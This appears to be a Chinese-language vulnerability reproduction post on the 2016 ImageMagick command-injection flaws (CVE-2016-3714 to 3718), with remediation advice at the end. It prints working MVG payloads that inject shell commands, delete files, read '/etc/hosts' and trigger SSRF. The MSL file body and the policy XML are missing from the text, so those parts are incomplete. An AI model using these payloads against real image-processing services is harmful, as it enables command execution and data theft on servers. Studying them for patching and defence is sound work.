【漏洞复现】ImageMagick命令注入漏洞(CVE-2016–3714/15/16/17/18)

文章目录

  • 1. 简介
  • 2. CVE-2016-3714漏洞原理
  • 3. 利用
    • CVE-2016-3714 POC:
    • CVE-2016-3715 POC:
    • CVE-2016-3716 POC:
    • CVE-2016-3717 POC:
    • CVE-2016-3718 POC:
  • 4. 修复

1. 简介

ImageMagic是一款图片处理工具,当传入一个恶意图片时,就有可能存在命令注入漏洞。

ImageMagick默认支持一种图片格式mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。

影响ImageMagick 6.9.3-9以前的所有版本

2. CVE-2016-3714漏洞原理

ImageMagick有一个功能叫做delegate(委托),作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行的。

在ImageMagick的默认配置文件/etc/ImageMagick/delegates.xml里可以看到所有的委托:这里它定义了很多占位符,比如%i是输入的文件名,%l是图片exif label信息。而在后面command的位置,%i和%l等占位符被拼接在命令行中。这个漏洞也因此而来,被拼接完毕的命令行传入了系统的system函数,而我们只需使用反引号(`)或闭合双引号,来执行任意命令。

漏洞触发点:


command=" "curl" -s -k -o "%o" "https:%M" "/>

尝试利用%M注入,双引号闭合url然后利用通管符进行命令执行

3. 利用

CVE-2016-3714 POC:

以下形式可以被检测为mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context

在这里插入图片描述
除了可以查看id,还可以注入其他命令:pwd、whoami
【漏洞复现】ImageMagick命令注入漏洞(CVE-2016–3714/15/16/17/18)_第1张图片

【漏洞复现】ImageMagick命令注入漏洞(CVE-2016–3714/15/16/17/18)_第2张图片

CVE-2016-3715 POC:

利用ImageMagick支持的ephemeral协议,来删除任意文件

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
popgraphic-context

CVE-2016-3716 POC:

利用ImageMagick支持的msl协议,来进行文件的读取和写入。msl协议是读取一个msl格式的xml文件,并根据其内容执行一些操作:

file_move.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt'
popgraphic-context

/tmp/msl.txt
-=-=-=-=-=-=-=-=-





CVE-2016-3717 POC:

可以造成本地文件读取漏洞:

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@/etc/hosts'
pop graphic-context

CVE-2016-3718 POC:

利用mvg格式中可以包含url的特点,进行SSRF攻击

push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context

4. 修复

  • 升级为最新版本
  • 处理图片前,先检查图片的 magic bytes,也就是图片头,如果图片头不是你想要的格式,那么就不调用ImageMagick处理图片。如果你是php用户,可以使用getimagesize函数来检查图片格式,而如果你是wordpress等web应用的使用者,可以暂时卸载ImageMagick,使用php自带的gd库来处理图片。
  • 使用policy file来防御这个漏洞,这个文件默认位置在 /etc/ImageMagick/policy.xml ,我们通过配置如下的xml来禁止解析https等敏感操作

你可能感兴趣的:(漏洞复现,安全)